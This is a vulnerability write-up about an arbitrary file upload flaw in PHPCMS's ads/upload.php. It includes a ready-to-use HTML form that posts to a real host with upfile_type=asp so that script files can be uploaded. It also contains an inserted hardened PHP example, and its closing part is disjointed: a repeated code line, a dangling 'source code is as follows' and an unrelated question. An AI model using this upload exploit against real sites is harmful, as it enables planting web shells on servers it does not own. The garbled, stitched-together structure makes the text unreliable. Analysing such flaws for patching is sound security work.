Vulnerability files: ads/upload.php and uppic.php
The code is as follows:
require "common.php";
require PHPCMS_ROOT."/class/upload.php";
if(!$_userid) message("Please log on or register first!", PHPCMS_PATH."member/login.php");
if($extid == 1) {
    $upfile_type = "jpg|png|gif";
} elseif($extid == 2) {
    $upfile_type = "swf";
}
if($action == 'upload')
{
    $fileArr = array(
        'file' => $previusfile,
        'name' => $previusfile_name,
        'size' => $previusfile_size,
        'type' => $previusfile_type
    );
    $showname = $fileArr['name'];
    $tmpext = strtolower(fileext($showname));
    $tmpfilesize = $fileArr['size'];
    $savepath = 'ads/'.$upfile_dir.'/'.date('Ym');
    $f->create(PHPCMS_ROOT."/".$savepath);
    $up = new upload($fileArr, $savepath, $upfile_type, 1, $upfile_size);
    ...........
The problem is that $upfile_type is not strictly filtered: it is only assigned when $extid is 1 or 2, and otherwise it keeps whatever value the request supplied, so the caller can choose the allowed upload type. In practice, files with any suffix except *.php and *.php3 can be uploaded.
The remaining check lives in PHPCMS_ROOT."/class/upload.php", which is Zend-encrypted, so it cannot be analysed directly.
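A hardened version of the type check, added here as an example and not PHPCMS's own code: the allowed extensions come from a fixed server-side table keyed by $extid, the request-supplied upfile_type is never consulted, and the file is taken from $_FILES rather than from the $previusfile_* variables. Assumed: PHPCMS_ROOT and $upfile_dir are defined by common.php as in the snippet, $extid arrives in the query string, and the helper name allowedUploadExt is hypothetical.

```php
<?php
// Added example (not PHPCMS code). Assumes common.php defines PHPCMS_ROOT
// and $upfile_dir; fallbacks are given so the file runs on its own.
defined('PHPCMS_ROOT') || define('PHPCMS_ROOT', __DIR__ . '/..');
$upfile_dir = $upfile_dir ?? 'uploadfile';

// Allowed extensions are fixed server-side, keyed by ad type ($extid).
// Nothing from the request (upfile_type or any other variable) is used.
const ALLOWED_BY_EXTID = [
    1 => ['jpg', 'png', 'gif'],
    2 => ['swf'],
];

// Return the extension the stored file may use, or null to reject.
function allowedUploadExt(int $extid, array $file): ?string
{
    if (!array_key_exists($extid, ALLOWED_BY_EXTID)) {
        return null;                                  // unknown ad type
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;                                  // nothing usable uploaded
    }
    // Only the last extension counts; a name like "a.php.jpg" yields "jpg",
    // and the stored name is generated below, never taken from the client.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_BY_EXTID[$extid], true)) {
        return null;
    }
    // For images, also require parsable image data: the suffix proves nothing.
    if ($extid === 1 && @getimagesize($file['tmp_name']) === false) {
        return null;
    }
    return $ext;
}

// Usage with PHP's upload array (assumed: extid comes from the query string).
$extid = (int)($_GET['extid'] ?? 0);
$ext   = allowedUploadExt($extid, $_FILES['previusfile'] ?? []);
if ($ext === null) {
    http_response_code(400);
    exit('upload type not allowed');
}
$savepath = PHPCMS_ROOT . '/ads/' . $upfile_dir . '/' . date('Ym');
if (!is_dir($savepath)) {
    mkdir($savepath, 0755, true);
}
// Random server-chosen file name with the whitelisted extension.
$target = $savepath . '/' . bin2hex(random_bytes(8)) . '.' . $ext;
move_uploaded_file($_FILES['previusfile']['tmp_name'], $target);
```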
if(!$_userid) message("Please log on or register first!", PHPCMS_PATH."member/login.php");
$_userid is obtained from the session, so the vulnerability can only be used by a registered user after logging in. The modified upload page is as follows:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>upload</title>
<meta name="keywords" content="">
<meta name="description" content="">
<meta name="generator" content="Phpcms">
<link href="/templates/default/skins/default/style.css" rel="stylesheet" type="text/css">
</head>
<body>
<script language="javascript" type="text/javascript">
<!--
function checkform()
{
    if(document.getElementById("previusfile").value == "") { alert("select the file to upload!"); return false; }
}
//-->
</script>
<table cellpadding="0" cellspacing="0" border="0" width="100%" height="5">
<tr>
<td></td>
</tr>
</table>
<form name="upload" method="post" action="http://www.phpcms.cn/ads/upload.php?action=upload&url=&upfile_type=asp" enctype="multipart/form-data" onSubmit="return checkform();">
<table cellpadding="2" cellspacing="1" class="tableborder">
<tr>
<th>File Upload</th>
</tr>
<tr>
<td class="tablerow" height="30">
Select: <input name="previusfile" type="file" id="previusfile" size="20" />
<input type="hidden" name="MAX_FILE_SIZE" value="" />
<input type="hidden" name="channelid" value="0" />
<input type="submit" name="submit" value="Upload">
</td>
</tr>
</table>
</form>
</body>
</html>
Now the asp file can be uploaded. Open the page in the logged-in browser window (so the session is kept); the suffix of the uploaded file follows the upfile_type variable in the form's action attribute. The source code of the upload page is as follows:
Following the local modification above, does the upload report an incorrect format?